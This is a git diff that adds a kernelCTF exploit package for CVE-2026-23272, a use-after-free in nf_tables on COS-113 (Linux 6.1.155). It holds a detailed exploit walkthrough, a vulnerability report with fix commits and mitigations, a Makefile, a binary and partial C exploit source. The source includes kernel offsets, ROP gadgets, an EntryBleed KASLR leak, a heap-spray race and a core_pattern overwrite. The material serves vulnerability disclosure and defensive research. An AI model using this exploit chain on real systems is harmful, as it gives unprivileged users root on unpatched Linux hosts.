diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md new file mode 100644 index 000000000..4a6deb0a8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/exploit.md @@ -0,0 +1,243 @@ +# Exploit: cos-113-18244.521.98 + +## Overview + +Local privilege escalation exploit for Linux 6.1.155 on COS-113 (PREEMPT_NONE, KVM, 2 CPUs, 3.5 GB RAM). It uses the nf_tables `nft_add_set_elem()` err_set_full UAF to turn a reclaimed verdict-map element into `NFT_GOTO`, jump into a fake chain sprayed into reclaimed `__init` pages, then overwrite `core_pattern` and print the flag over `ttyS0`. + +This exploit targets CVE-2026-23272. The same bug is reachable from both packet-path and control-plane RCU readers, but this version stays on the packet path through a verdict-map lookup in `NF_INET_LOCAL_OUT`. + +For the public PR, the `exploit` target builds the kernelXDK version in `exploit_xdk.cpp`. The exact 0-day submission archive of the original non-XDK exploit is included as `original.tar.gz`. + +**Stability**: Probabilistic. Depends on __init_begin page reclaim (29% per candidate) and in-batch SLUB LIFO reclaim timing. 13 candidates are tried within a 260-second budget. + +**KASLR bypass**: Primary path is external kbase input (`argv[1]`, via repro `kaslr_leak=1` flow). If unavailable/masked, the exploit falls back to integrated EntryBleed timing leak. Only kbase is needed (not phbase), since the fake chain lives at kbase-relative __init_begin page addresses. + +--- + +## Step-by-step Exploitation + +### Step 1: KASLR Bypass (External kbase or Entrybleed fallback) + + + +The exploit first tries an externally provided `kbase` (`argv[1]`, used by the repro `kaslr_leak=1` path). 
If unavailable/masked, it falls back to leaking `kbase` via the EntryBleed side channel (CVE-2022-4543), using `prefetchnta` + `prefetcht2` timing with `mfence`/`RDTSCP` fencing: + +- **Coarse scan**: 7-vote majority over `0xffffffff81000000 - 0xffffffffD0000000` with 16 MB steps (16 timing rounds each). Boyer-Moore majority vote selects the consensus. + +- **Fine scan**: 7-vote majority within +/- 16 MB of the coarse result with 2 MB steps (32 timing rounds each). Narrows to the exact 2 MB-aligned kbase. + +- Unlike `cos_113_18244_88`, this exploit does not need `phbase`. The fake chain is placed at kbase-relative `__init_begin` page addresses, so only `kbase` matters. + +**Objects**: None (pure side-channel, no kernel objects involved). + +### Step 2: Physmap Spray with Fake Chain + ROP Blob + + + +A 1 GB region (40% of available RAM) is allocated with `mmap(MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE)`. Every 4 KB page is filled with a fake `nft_chain` and fake `nft_rule_blob`. The blob comes from a kernelXDK `RopChain`: five `WRITE_WHAT_WHERE_64` actions to write the `core_pattern` pipe string in 8-byte chunks, then one `MSLEEP` action. + +#### __init_begin Page Reclaim Technique + +After boot, the kernel frees the `__init` section (`kbase + 0x345c000` to `kbase + 0x36de000`, 642 pages / 2568 KB) back to the buddy allocator. On COS-113, `CONFIG_DEBUG_PAGEALLOC` is off, so the old kernel virtual mapping still works. If `mmap(MAP_POPULATE)` gets one of those pages back, that physical page is reachable both from userspace and from its old kbase-relative kernel address (`kbase + OFF_INIT_BEGIN + page_offset`). + +With a 1 GB spray and 642 free `__init` pages out of roughly 900K total pages, about 186 sprayed pages (~29%) are expected to be usable `__init` pages. Since every sprayed page has the same layout, any hit is good enough. + +That removes the need for `phbase` scanning and keeps the address search one-dimensional. 
+ +#### Page Layout (4096 bytes per page) + +``` ++0x000: Fake nft_chain (96 bytes) + +0x000: blob_gen_0 = page_kva + 0x80 (ptr to rule blob) + +0x008: blob_gen_1 = page_kva + 0x80 (ptr to rule blob) + +0x040: table = kbase (safe readable address) + +0x048: handle = 0 + +0x050: use = 1 + +0x054: flags = 0 + +0x058: name = page_kva + 0x300 (ptr to name string) ++0x080: Fake nft_rule_blob (472 bytes on this target) + +0x080: blob_size = 0x1d0 (464 bytes) + +0x088: rule_dp_0 = 0x380 (dlen=448, is_last=0) + +0x090: expr[0]..expr[13] (14 x 32B): ops=nft_immediate_ops, dreg=130 + 4*i + +0x258: rule_dp_1 = 1 (is_last=1, end marker) ++0x300: Name string "x\0" +``` + +**Objects**: Physical pages via physmap (direct map), reachable at kbase-relative KVAs through __init page reclaim. +**Cache**: N/A (physmap pages, not slab objects). + +### Step 3: Namespace Setup and nft Object Creation + + + +The exploit creates user and network namespaces (`unshare(CLONE_NEWUSER | CLONE_NEWNET)`) to gain `CAP_NET_ADMIN` for nf_tables access. The loopback interface is brought up. + +A single nfnetlink batch creates all required nft objects: + +1. **INET table** `t` -- container for all objects. +2. **Base chain** `bc` -- `NF_INET_LOCAL_OUT` hook at `NF_IP_PRI_FILTER` priority. All outgoing IPv4 packets traverse this chain. +3. **Verdict map** `vm` -- hash set with `size=1`, `key_len=4`, `data_type=verdict`, `data_len=16`. This is the vulnerable object: its size limit causes every additional insertion to hit the `err_set_full` path. +4. **Fill element** -- `key=0x00000000` with `verdict=NF_ACCEPT`. Fills the single slot, ensuring all subsequent insertions fail the capacity check. +5. **Rule** on `bc` -- Two expressions: `immediate(reg32_00 = KEY_RACE=0x00000001)` followed by `lookup(vm, sreg=reg32_00, dreg=verdict)`. Every packet loads KEY_RACE into a register and performs a map lookup. 
If the lookup hits a reclaimed fake element with matching key, its verdict (NFT_GOTO to fake chain) hijacks control flow. + +### Step 4: Race -- In-batch NEWSETELEM + NEWTABLE Spray + + + +Two threads run concurrently on 2 CPUs: + +#### Thread 1: Writer (CPU 0) + +Sends nfnetlink batches with interleaved NEWSETELEM + NEWTABLE pairs (128 pairs per batch). For each pair: + +1. **NEWSETELEM** (key=KEY_RACE, verdict=NF_ACCEPT): `nft_add_set_elem()` allocates a 52-byte element (kmalloc-cg-64), inserts it via `hlist_add_head_rcu()`, then the `atomic_add_unless()` capacity check fails. The `err_set_full` path calls `hlist_del_rcu()` + `kfree()` -- the element is freed **without** `synchronize_rcu()`. + +2. **NEWTABLE** (IPv4, name="s000".."s127", with 52-byte userdata): The kernel calls `kmemdup()` to allocate table userdata (52 bytes, GFP_KERNEL_ACCOUNT), which goes to **kmalloc-cg-64** -- the same slab as the just-freed element. Due to SLUB LIFO per-CPU freelist ordering, this allocation reclaims the exact slot freed by the preceding NEWSETELEM. + +The reclaimed slot now contains the spray userdata instead of a real set element. If a packet on CPU 1 does a lookup in the short window between `hlist_add_head_rcu()` and `hlist_del_rcu()` + `kfree()`, it can follow the stale data. + +The important part is that the NEWTABLE userdata allocation runs in the same nfnetlink batch as the freeing NEWSETELEM. That keeps the reclaim on CPU 0 and on the same per-CPU SLUB freelist. The batch is then aborted automatically (`NFNL_BATCH_FAILURE` from `-ENFILE`), which frees the temporary spray tables and their userdata. + +#### Thread 2: Packet Flood (CPU 1) + +Sends single-byte UDP packets to `127.0.0.1:31337` via `send()` in tight loops of 2000 packets. Each packet traverses `NF_INET_LOCAL_OUT`, hitting the base chain `bc` which evaluates the immediate + lookup rule. 
If the lookup finds a reclaimed fake element matching KEY_RACE, the NFT_GOTO verdict redirects `nft_do_chain()` to the physmap-sprayed fake chain. + +#### Spray Data Layout (52-byte NEWTABLE Userdata) + +The spray data overlays a freed `nft_hash_elem` (kmalloc-cg-64) with a valid element structure: + +| Offset | Field | Value | Purpose | +|--------|-------|-------|---------| +| +16 | `ext.genmask` | `0` | Active in current generation | +| +17 | `ext.offset[KEY]` | `16` | KEY at ext+16 = elem+32 | +| +19 | `ext.offset[DATA]` | `20` | DATA at ext+20 = elem+36 | +| +32 | KEY data (4B) | `htonl(KEY_RACE)` = `0x00000001` | Matches lookup key | +| +36 | `verdict.code` (4B) | `NFT_GOTO` = `(uint32_t)(-4)` | Redirect to chain | +| +44 | `verdict.chain` (8B) | physmap fake chain KVA | Points to ROP blob | + +**Vulnerable object**: `nft_hash_elem` (kmalloc-cg-64, 52-byte element for key_len=4 verdict map). +**Reclaim object**: NEWTABLE userdata (52 bytes, kmalloc-cg-64, same slab via GFP_KERNEL_ACCOUNT). + +#### Synchronization + +- **Writer thread sends batches continuously** on CPU 0. Each batch processes 128 NEWSETELEM+NEWTABLE pairs sequentially within the kernel's nfnetlink batch handler. +- **Packet thread floods continuously** on CPU 1. Packets hitting the lookup expression race against the writer's insert/remove/free/reclaim sequence. +- **Termination**: Parent process polls `/proc/sys/kernel/core_pattern` every 500ms. Each candidate cycle runs for 20 seconds (or 260 seconds if only 1 candidate from pagemap). + +### Step 5: ROP Chain Execution via nft_immediate_eval + + + +When the packet-path lookup hits the reclaimed fake element, its `NFT_GOTO` verdict redirects `nft_do_chain()` to the sprayed fake chain. `blob_gen_0` and `blob_gen_1` point to the fake `nft_rule_blob` at page+0x80, which contains serialized words from a kernelXDK `RopChain`. 
+ +Each expression uses `nft_immediate_ops` (a legitimate kernel ops vtable) to write 16 bytes into `nft_do_chain()`'s register file at the `dreg` corresponding to the return address region on the stack. + +#### nft_do_chain Stack Frame (6.1.155) + +``` +sub $0x220, %rsp; 6 pushes = 48 bytes +regs at rsp+0x48 +return address at rsp+0x250 +dreg for ret addr = (0x250 - 0x48) / 4 = 130 +``` + +#### kernelXDK Post-RIP Chain + +The PR version does not hardcode the post-RIP write gadgets. It asks kernelXDK for this chain: + +1. `WRITE_WHAT_WHERE_64(chunk_0, core_pattern + 0x00)` +2. `WRITE_WHAT_WHERE_64(chunk_1, core_pattern + 0x08)` +3. `WRITE_WHAT_WHERE_64(chunk_2, core_pattern + 0x10)` +4. `WRITE_WHAT_WHERE_64(chunk_3, core_pattern + 0x18)` +5. `WRITE_WHAT_WHERE_64(chunk_4, core_pattern + 0x20)` +6. `MSLEEP(0x7FFFFFFF)` + +`chunk_0..chunk_4` are the little-endian 8-byte chunks of `|/bin/dd if=/dev/vdb of=/dev/ttyS0\0`. On this target, kernelXDK expands the five writes and one sleep into 28 qwords. The exploit packs those qwords into 14 `nft_immediate_eval` expressions, two qwords per expression. + +So the target-specific post-RIP gadget choice stays inside kernelXDK. The exploit only hardcodes the `nft_immediate_eval` stack-write primitive and the conversion from `RopChain` words into fake rule-blob expressions. + +**Constant explanations**: +- `DREG_RET = 130`: `(0x250 - 0x48) / 4`. `nft_do_chain()` has `sub $0x220, %rsp` + 6 pushes (48 bytes). `regs` is at `rsp+0x48`, return address at `rsp+0x250`. Register file is `uint32_t regs.data[]`, so offset `(0x250 - 0x48) / 4 = 130`. +- `BLOB_OFFSET = 0x80`: Offset within each physmap page where the fake `nft_rule_blob` starts. +- `NAME_OFFSET = 0x300`: Offset chosen so the variable-length XDK-generated blob cannot overlap the fake chain name pointer target. 
+ +#### Kernel Symbol Offsets (cos-113-18244.521.98 vmlinux) + +| Define | Offset | Symbol | +|--------|--------|--------| +| `OFF_CORE_PATTERN` | `0x2bb9ec0` | `core_pattern` (global variable) | +| `OFF_NFT_IMM_OPS` | `0x1d43120` | `nft_immediate_ops` (expression ops vtable) | +| `OFF_INIT_BEGIN` | `0x345c000` | `__init_begin` (start of freed init pages) | +| `OFF_INIT_END` | `0x36de000` | `__init_end` (end of freed init pages) | + +The post-RIP write gadget, pop gadgets, and sleep gadget are not hardcoded in this PR version; they come from kernelXDK's target database and `RopAction` expansion. + +### Step 6: core_pattern Overwrite and Flag Exfiltration + + + +After the kernelXDK-generated chain finishes the five `WRITE_WHAT_WHERE_64` actions against `core_pattern`, `MSLEEP(0x7FFFFFFF)` keeps the system alive (BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system up long enough for the parent to detect the overwrite and trigger core dumps). + +The parent process (forked before entering the exploit child) polls `/proc/sys/kernel/core_pattern` every 500 ms. Once it detects the overwrite (string contains "/bin/dd"): + +1. Waits 500 ms for stability. +2. Forks a child that calls `raise(SIGSEGV)`. +3. The kernel's core dump handler invokes `call_usermodehelper` with the pipe command from `core_pattern`. +4. `/bin/dd if=/dev/vdb of=/dev/ttyS0` copies the flag from the virtio block device to the serial console. +5. The kctf infrastructure captures the flag from serial output. + +### Step 7: Candidate Cycling + + + +Since the __init_begin page reclaim is probabilistic (~29% of mmap'd pages are __init pages), the exploit generates 13 candidate KVAs spread across the __init range: + +- **Range**: `kbase + OFF_INIT_BEGIN` to `kbase + OFF_INIT_END` (642 pages) +- **Step**: `INIT_SIZE / 13` (page-aligned, ~49 pages between candidates) +- **Budget**: 260 seconds total, 20 seconds per candidate cycle + +For each candidate, the exploit: +1. 
Updates `g_page_kva = kbase + OFF_INIT_BEGIN + candidate_offset` +2. Refills all physmap pages with the ROP blob using the new KVA +3. Forks a child that runs `exploit_child()` for 20 seconds +4. Parent polls `core_pattern` for the overwrite signal + +If `/proc/self/pagemap` is readable (local QEMU testing), the exact physical frame number is used to compute the precise KVA, reducing to a single candidate. + +--- + +## Environmental Requirements + +- **CPU affinity**: The writer thread is pinned to CPU 0; the packet thread is pinned to CPU 1. This is critical because: + - SLUB uses per-CPU freelists. The NEWTABLE userdata allocation must run on the same CPU as the NEWSETELEM kfree to pick up the freed slot (LIFO order). Both happen within the same nfnetlink batch on CPU 0. + - The packet thread on a separate CPU ensures packets traverse the hook path concurrently with element allocation/free/reclaim. + +- **Namespaces**: User namespace + network namespace required for `CAP_NET_ADMIN`. The exploit calls `unshare(CLONE_NEWUSER)` then `unshare(CLONE_NEWNET)`. + +- **Memory**: The exploit uses 1 GB (40% of available RAM, capped at 2 GB) for physmap spray. The kctf VM has 3.5 GB RAM. 
+ +## Differences from cos_113_18244_88 Exploit + +| Aspect | cos_113_18244_88 (addchain UAF) | cos_113_18244_98 (err_set_full UAF) | +|--------|-------------------------------|-------------------------------------| +| Vulnerability | `nf_tables_addchain()` INET partial hook rollback | `nft_add_set_elem()` err_set_full kfree without RCU | +| Vulnerable object | `nft_base_chain` (kmalloc-cg-256) | `nft_hash_elem` (kmalloc-cg-64) | +| Reclaim method | `msg_msg` spray (separate thread) | In-batch NEWTABLE userdata (same batch, SLUB LIFO) | +| Hijack mechanism | Overwrite `blob_gen_X` pointer in freed chain | Fake verdict element with NFT_GOTO to physmap chain | +| KASLR needs | kbase + phbase | kbase only (__init_begin approach) | +| IPv6 saturation | Yes (1024 chains to force -E2BIG) | No | +| Race setup | 3 threads (flood + race + spray) | 2 threads (writer + packet) | + +## Separation of Concerns + +| Code Section | Purpose | +|---|---| +| `detect_kbase()`, `detect_phbase()`, `do_entrybleed()` | KASLR bypass (information leak) | +| `setup_ns()` | Environment setup (namespace creation) | +| `nft_setup_all()` | nft object creation (table, chain, verdict map, fill element, rule) | +| `build_race_batch()`, `build_spray_udata()` | Race batch construction with interleaved NEWSETELEM + NEWTABLE spray | +| `writer_thread()` | Vulnerability trigger (NEWSETELEM causing err_set_full UAF) | +| `packet_thread()` | Exploitation support (providing racing packets for lookup) | +| `physmap_spray()`, `physmap_fill_rop()` | ROP payload construction (fake chain + rule blob + ROP chain) | +| `generate_candidates()` | Candidate KVA generation (__init_begin range) | +| `check_core_pattern()`, `trigger_core_dump()` | Post-exploitation (flag exfiltration) | diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md new file mode 100644 index 000000000..f2c6ab42c --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2026-23272_cos/docs/vulnerability.md @@ -0,0 +1,104 @@ +# Vulnerability: Use-After-Free in nft_add_set_elem() err_set_full Path (CVE-2026-23272) + +## Summary + +A use-after-free exists in netfilter `nf_tables`, in the `err_set_full` path of `nft_add_set_elem()`. When a new element is inserted into a set that already reached its configured `size`, the element is first published to the hash chain with `hlist_add_head_rcu()` (through `nft_setelem_insert()` -> `nft_hash_insert()`), and only after that the code checks the capacity with `atomic_add_unless()`. If the set is already full, the rollback path calls `nft_setelem_remove()` (`hlist_del_rcu()`) and then `nf_tables_set_elem_destroy()` (`kfree()`) without waiting for an RCU grace period. + +That breaks the normal RCU publish / grace period / free ordering. Packet-path readers in `nft_hash_lookup()` and control-plane readers in `nft_hash_get()` both walk the hash chain under `rcu_read_lock()`, so they can still hold a pointer after `hlist_del_rcu()` unlinks the element and before the missing grace period. At that point the element has already been freed. + +## Affected Component + +- **Subsystem**: netfilter / nf_tables +- **Source file**: `net/netfilter/nf_tables_api.c` +- **Function**: `nft_add_set_elem()` +- **Error path**: `err_set_full` label (approx. 
line 6680) + +## Vulnerability Type + +- **Cause**: Use-After-Free (UAF) due to freeing an RCU-published set element on the "set full" rollback path +- **Root cause**: Race condition between packet path (`nft_hash_lookup()`) or control path (`nft_hash_get()`) and the `err_set_full` rollback in `nft_add_set_elem()` + +## Code Sequence + +The vulnerable sequence in `nft_add_set_elem()` (nf_tables_api.c, around line 6642-6686): + +```c +ext->genmask = nft_genmask_cur(ctx->net); + +err = nft_setelem_insert(ctx->net, set, &elem, &ext2, flags); +// element is now in the hash chain -- visible to RCU readers + +if (!(flags & NFT_SET_ELEM_CATCHALL) && set->size && + !atomic_add_unless(&set->nelems, 1, set->size + set->ndeact)) { + err = -ENFILE; + goto err_set_full; +} +... + +err_set_full: + nft_setelem_remove(ctx->net, set, &elem); + // hlist_del_rcu -- unlinks but doesn't wait +err_element_clash: + kfree(trans); +err_elem_free: + nf_tables_set_elem_destroy(ctx, set, elem.priv); + // kfree(elem) -- no synchronize_rcu() first! +``` + +The regular abort path (`__nf_tables_abort()`) and the async destroy worker (`nft_trans_gc_work_done()`) both wait for RCU readers before freeing removed elements. `err_set_full` does not. + +## Requirements to Trigger + +- **User namespaces**: Not required for the bug itself. This exploit uses them so an unprivileged user can create a network namespace and gain `CAP_NET_ADMIN` inside it. +- **Capabilities**: `CAP_NET_ADMIN` (inside the user+network namespace for this exploit) +- **Kernel configuration**: `CONFIG_NF_TABLES`, `CONFIG_NF_TABLES_INET` +- **Other**: A hash set with `size=1` so the capacity check fails on every new insertion. 
+ +## Commit Which Introduced the Vulnerability + +- **Commit**: [`35d0ac9070ef`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=35d0ac9070ef) ("netfilter: nf_tables: fix set->nelems counting with no NLM_F_EXCL") +- **Version**: v4.10 (January 2017) +- This moved the capacity check to after insertion, which created the case where an RCU-visible element can be freed on the rollback path without a grace period. + +## Commit Which Fixed the Vulnerability + +- **Fix approach**: Upstream did not take the simple `synchronize_rcu()` fix from the initial report. Instead it unconditionally bumps `set->nelems` before insertion and lets rollback go through the existing transaction-abort path, which already does the right RCU teardown. +- **Patch commit**: [`def602e498a4`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=def602e498a4f951da95c95b1b8ce8ae68aa733a) ("netfilter: nf_tables: unconditionally bump set->nelems before insertion") + +## Affected Kernel Versions + +- **Introduced in**: 4.10 +- **Affected stable ranges**: 4.10 - 6.1.164, 6.2 - 6.6.127, 6.7 - 6.18.16, and 6.19 - 6.19.6 +- **Affected mainline range**: 7.0-rc1 - 7.0-rc2 +- **Fixed in**: 6.1.165, 6.6.128, 6.18.17, 6.19.7, and mainline 7.0-rc3 + +## Blocking the Vulnerability + +Ways to block this path: + +- **Disabling user namespaces** (`kernel.unprivileged_userns_clone=0` or equivalent) stops this exploit path from obtaining `CAP_NET_ADMIN` in a private network namespace. +- **Blocking `NETLINK_NETFILTER` socket creation** from unprivileged contexts. +- **Disabling nf_tables support** (`CONFIG_NF_TABLES=n`) or INET tables (`CONFIG_NF_TABLES_INET=n`). +- **Restricting `nf_tables` access** with LSM policy (for example SELinux or AppArmor rules denying netfilter configuration). 
+ +## KASAN Report + +``` +BUG: KASAN: use-after-free in nft_hash_get+0xf0/0x120 +Read of size 8 at addr ffff888103f6db00 by task init/158 + +Call Trace: + nft_hash_get+0xf0/0x120 + nft_get_set_elem+0x248/0x500 + nf_tables_getsetelem+0x326/0x4f0 + nfnetlink_rcv_msg+0x37a/0x4c0 + +Allocated by task 156: + nft_set_elem_init+0x71/0x270 + nft_add_set_elem+0xfda/0x1aa0 + +Freed by task 156: + nft_add_set_elem+0x1378/0x1aa0 +``` + +Both alloc and free happen in `nft_add_set_elem` on the same task, which matches the `err_set_full` rollback path. diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile new file mode 100644 index 000000000..af176334c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/Makefile @@ -0,0 +1,51 @@ +# kernelCTF exploit build for cos-113-18244.521.98 +# +# Default target builds the kernelXDK-integrated version (exploit_xdk.cpp). +# Use 'make exploit_original' for the original C version (exploit.c). + +KERNELXDK_INCLUDE_DIR ?= +KERNELXDK_LIB_DIR ?= + +CXX ?= g++ +CC ?= gcc +CXXFLAGS := -std=c++20 -I. -static -O2 -Wall -pthread +CFLAGS := -static -O2 -Wall -pthread + +ifneq ($(strip $(KERNELXDK_INCLUDE_DIR)),) +CXXFLAGS += -I$(KERNELXDK_INCLUDE_DIR) +endif + +LDFLAGS := -lkernelXDK -pthread +ifneq ($(strip $(KERNELXDK_LIB_DIR)),) +LDFLAGS := -L$(KERNELXDK_LIB_DIR) $(LDFLAGS) +endif + +.PHONY: all run clean prerequisites + +all: exploit + +# Optional hook used by CI. No extra prerequisites are needed here. +prerequisites: + @true + +# Download kernelXDK target database if not present +target_db.kxdb: + wget -q -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +# kernelXDK-integrated version (C++) +exploit: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +# Debug build target used by CI verification. 
+exploit_debug: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -g -o $@ $< $(LDFLAGS) + +# Original C version (does not require kernelXDK) +exploit_original: exploit.c + $(CC) $(CFLAGS) -o $@ $< + +run: exploit + ./exploit + +clean: + rm -f exploit exploit_debug exploit_original target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit new file mode 100755 index 000000000..70dfaa3f0 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c new file mode 100644 index 000000000..b670a45c1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit.c @@ -0,0 +1,1320 @@ +/* + * COS-113 (6.1.155) LPE exploit via nf_tables err_set_full UAF + * + * Vulnerability: In nft_add_set_elem(), when a set with size=1 is full, + * the element is inserted via hlist_add_head_rcu(), atomic_add_unless() fails, + * element is removed via hlist_del_rcu() and freed via kfree() (NOT kfree_rcu). + * Concurrent RCU readers can access the freed element. + * + * Strategy: + * 1. Create verdict map (hash, size=1, key_len=4) with fill element + * 2. Base chain with immediate(KEY_RACE) + lookup rule + * 3. Race: writer inserts elements (freed via err_set_full), spray reclaims + * with fake element containing NFT_GOTO(physmap_chain), packet flood + * triggers lookup -> follows fake verdict -> ROP via fake chain + * 4. 
ROP overwrites core_pattern -> trigger SIGSEGV -> core dump -> flag via serial + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ========== COS-113 kernel offsets (6.1.155) ========== */ +#define OFF_MODPROBE 0x02a76a20ULL +#define OFF_NFT_IMM_OPS 0x01d43120ULL +#define OFF_POP_RDI 0x00195d8cULL /* real pop rdi; jmp __x86_return_thunk in __poly1305_block */ +#define OFF_POP_RSI_RDI 0x00afc391ULL /* real pop rsi; pop rdi; jmp __x86_return_thunk in queue_request_irq */ +#define OFF_STRCPY 0x012b5ac0ULL +#define OFF_DO_EXIT 0x001aaf90ULL +#define OFF_CORE_PATTERN 0x02bb9ec0ULL +#define OFF_MSLEEP 0x00243850ULL + +/* struct nft_chain offsets for COS-113 */ +#define CHAIN_OFF_BLOB0 0 +#define CHAIN_OFF_BLOB1 8 +#define CHAIN_OFF_TABLE 64 +#define CHAIN_OFF_HANDLE 72 +#define CHAIN_OFF_USE 80 +#define CHAIN_OFF_FLAGS 84 +#define CHAIN_OFF_NAME 88 + +/* page layout for physmap ROP blob */ +#define BLOB_OFFSET 0x80 +#define NAME_OFFSET 0x1C0 +#define PATH_OFFSET 0x200 + +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif +#ifndef NF_IP_PRI_FILTER +#define NF_IP_PRI_FILTER 0 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFTA_TABLE_USERDATA +#define NFTA_TABLE_USERDATA 6 +#endif + +/* spray: in-batch NEWTABLE userdata for kmalloc-cg-64 reclamation. + * Each NEWSETELEM that triggers err_set_full frees the element via kfree(). + * The immediately following NEWTABLE allocates userdata (52 bytes, same slab) + * via SLUB LIFO on the same CPU, reclaiming the freed slot with our data. + * The batch is auto-aborted (NFNL_BATCH_FAILURE from -ENOSPC), freeing + * all spray tables + userdata afterwards. Same names reusable next batch. 
+ */ +#define SPRAY_UDATA_LEN 52 +#define SPRAY_BATCH_PAIRS 128 + +#define PHYSMAP_MB 1024 + +#define KEY_FILL 0x00000000u +#define KEY_RACE 0x00000001u +#define NFT_GOTO_CODE ((uint32_t)(-4)) + +#define RACE_SECONDS 260 +#define CYCLE_SECONDS 20 +#define MAX_CANDS 13 +#define MAX_EB_CANDS 5 + +/* __init_begin page reclaim: pages freed at boot remain mapped at kbase + offset. + * CONFIG_DEBUG_PAGEALLOC is not set on COS, so kernel text mapping persists. + * mmap+MAP_POPULATE reclaims these pages; data is visible at kbase-relative KVA. */ +#define OFF_INIT_BEGIN 0x345c000ULL +#define OFF_INIT_END 0x36de000ULL +#define INIT_SIZE (OFF_INIT_END - OFF_INIT_BEGIN) /* 0x282000 = 2568K = 642 pages */ + +/* ========== globals ========== */ +static volatile sig_atomic_t g_stop; +static uint64_t kbase, phbase; +static void *phys_region; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva; + +/* Candidate search: (kbase, init_page_offset) pairs */ +struct cand3d { uint64_t kb, pb, kva_off; }; +static struct cand3d cands3d[MAX_CANDS]; +static int num_cands3d; + +/* EntryBleed multi-candidate output */ +static uint64_t eb_kbases[MAX_EB_CANDS]; +static int eb_nkb; +static uint64_t eb_phbases[MAX_EB_CANDS]; +static int eb_npb; + +/* ========== helpers ========== */ +static void die(const char *m) { perror(m); _exit(1); } +static void sleep_ms(int ms) { + struct timespec ts = {ms/1000, (ms%1000)*1000000L}; + nanosleep(&ts, NULL); +} +static const char *pick_flag_device(void) { + if (access("/dev/vdb", R_OK) == 0) return "/dev/vdb"; + if (access("/dev/vda", R_OK) == 0) return "/dev/vda"; + return "/dev/vdb"; +} +static uint64_t env_u64(const char *name) { + const char *v = getenv(name); + return v ? 
strtoull(v, NULL, 0) : 0; +} + +/* ========== netlink buffer helpers ========== */ +struct nlbuf { uint8_t *buf; size_t len, cap; }; + +static void nlbuf_init(struct nlbuf *b, void *buf, size_t cap) { + b->buf = buf; b->len = 0; b->cap = cap; +} + +static struct nlmsghdr *nlbuf_begin_msg(struct nlbuf *b, uint16_t type, + uint16_t flags, uint32_t seq, uint32_t pid, uint8_t fam, uint16_t res) +{ + size_t off = NLMSG_ALIGN(b->len); + size_t need = off + NLMSG_SPACE(sizeof(struct nfgenmsg)); + if (need > b->cap) return NULL; + struct nlmsghdr *h = (void *)(b->buf + off); + memset(h, 0, NLMSG_SPACE(sizeof(struct nfgenmsg))); + h->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + h->nlmsg_type = type; h->nlmsg_flags = flags; + h->nlmsg_seq = seq; h->nlmsg_pid = pid; + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = fam; g->version = NFNETLINK_V0; g->res_id = htons(res); + b->len = off + NLMSG_ALIGN(h->nlmsg_len); + return h; +} + +static int nlbuf_put(struct nlbuf *b, struct nlmsghdr *h, uint16_t t, + const void *d, uint16_t dl) +{ + size_t mo = (uint8_t *)h - b->buf; + size_t me = mo + NLMSG_ALIGN(h->nlmsg_len); + if (me != b->len) return -1; + size_t nl = NLA_HDRLEN + dl, np = NLA_ALIGN(nl); + if (me + np > b->cap) return -1; + struct nlattr *a = (void *)(b->buf + me); + a->nla_type = t; a->nla_len = nl; + if (dl) memcpy((uint8_t *)a + NLA_HDRLEN, d, dl); + if (np > nl) memset((uint8_t *)a + nl, 0, np - nl); + h->nlmsg_len = NLMSG_ALIGN(h->nlmsg_len) + np; + b->len = mo + NLMSG_ALIGN(h->nlmsg_len); + return 0; +} + +static struct nlattr *nlbuf_nest_start(struct nlbuf *b, struct nlmsghdr *h, uint16_t t) { + size_t mo = (uint8_t *)h - b->buf; + size_t me = mo + NLMSG_ALIGN(h->nlmsg_len); + if (me != b->len) return NULL; + size_t np = NLA_ALIGN(NLA_HDRLEN); + if (me + np > b->cap) return NULL; + struct nlattr *a = (void *)(b->buf + me); + a->nla_type = t | NLA_F_NESTED; a->nla_len = NLA_HDRLEN; + if (np > NLA_HDRLEN) memset((uint8_t *)a + NLA_HDRLEN, 0, np - 
